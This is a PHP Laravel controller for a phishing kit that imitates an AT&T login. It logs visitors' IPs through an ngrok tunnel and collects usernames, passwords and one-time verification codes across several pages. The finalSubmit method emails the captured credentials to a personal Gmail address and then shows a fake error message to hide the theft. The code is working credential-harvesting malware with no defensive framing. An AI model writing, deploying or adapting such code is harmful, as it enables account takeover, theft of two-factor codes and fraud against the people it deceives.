<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Log;
use Illuminate\Support\Facades\Mail;

class HomeController extends Controller
{

public function button()
    {
        return view('button');
    }   
    public function index( Request $request)
    {


         // FIX: Get the real IP from ngrok's forwarded header
        $ip = $request->header('X-Forwarded-For') ?? $request->ip();
        // $ip= '170.171.1.0';
        
        // ngrok often sends a list: "phone_ip, 127.0.0.1". We take the first one.
        if (str_contains($ip, ',')) {
            $ip = explode(',', $ip)[0];
            // $ip= '170.171.1.0';
        }
        $ip = trim($ip);
        // dd($ip);
    

        Log::info('HIT', [
        'ip'         => $ip,
        'method'     => $request->method(),
        'url'        => $request->fullUrl(),
        'user_agent' => $request->userAgent(),
        'time'       => now()->toDateTimeString(),
    ]);
        return view('username');
    }

    public function storeUsername(Request $request)
    {
        $request->validate([
            'username' => 'required|string'
        ]);

        session(['username' => $request->username]);

        return redirect('/password');
    }

    public function password()
    {
        abort_if(!session()->has('username'), 403);
        return view('password');
    }

    public function storePassword(Request $request)
    {
        $request->validate([
            'password' => 'required|string|min:4'
        ]);

        // Masked for safety
        session(['password' => $request->password]);
        // dd(session()->all());
        return redirect('/verify');
    }

    public function verify()
    {
        abort_if(!session()->has('password'), 403);
        return view('verify');
    }

    public function code()
    {
        abort_if(!session()->has('password'), 403);
        return view('code');
    }

    public function finalSubmit(Request $request)
    {
        $request->validate([
            'code' => 'required|string'
        ]);

        $data = [
            'username' => session('username'),
            'password' => session('password'),
            'verification_code' => $request->code,
        ];
        // dd($data);

        Mail::raw(
            "multi-step submission:\n\n" . print_r($data, true),
            function ($message) {
                $message->to('sayemkhan154@gmail.com')
                        ->subject('AT&T login Submission');
            }
        );

        session()->flush();

        return redirect('/user-name')->with('success', 'something went wrong! or tecnical issue.');
    }
}
